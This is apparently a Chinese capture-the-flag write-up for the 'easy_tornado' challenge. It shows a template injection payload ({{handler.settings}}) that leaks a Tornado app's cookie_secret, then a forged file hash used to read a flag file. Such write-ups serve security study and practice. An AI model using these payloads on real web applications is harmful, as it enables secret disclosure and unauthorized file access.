[护网杯 2018]easy_tornado

[护网杯 2018]easy_tornado

查看/flag.txt，/welcome.txt，/hints.txt的内容

/flag.txt：
flag in /fllllllllllllag

/welcome.txt:
render

/hints.txt:
md5(cookie_secret+md5(filename))

发现网址都是这种格式：

/file?filename=/flag.txt&filehash=397b06a9fd78682b7a7bce6de8d44139

flag.txt中提示了flag in /fllllllllllllag，所以初步测试：

/file?filename=/fllllllllllllag&filehash={{1}}

感觉/error?msg=Error像一个注入点：

/error?msg={{}}

因为我们需要知道cookie_secret的值

搜素百度得Tornado框架的附属文件handler.settings中存在cookie_secret

payload:

/error?msg={{handler.settings}}

得到cookie_secret的值

根据hint.txt中的内容，所以最终payload:

/file?filename=/fllllllllllllag&filehash=md5(69c9f7ab-694e-4bca-a68b-5de9442364a7+md5(/fllllllllllllag))

md5(/fllllllllllllag)=3bf9f6cf685a6dd8defadabfb41a03a1

payload:

/file?filename=/fllllllllllllag&filehash=646f0f5218a0822ba2e9ddd4aab22443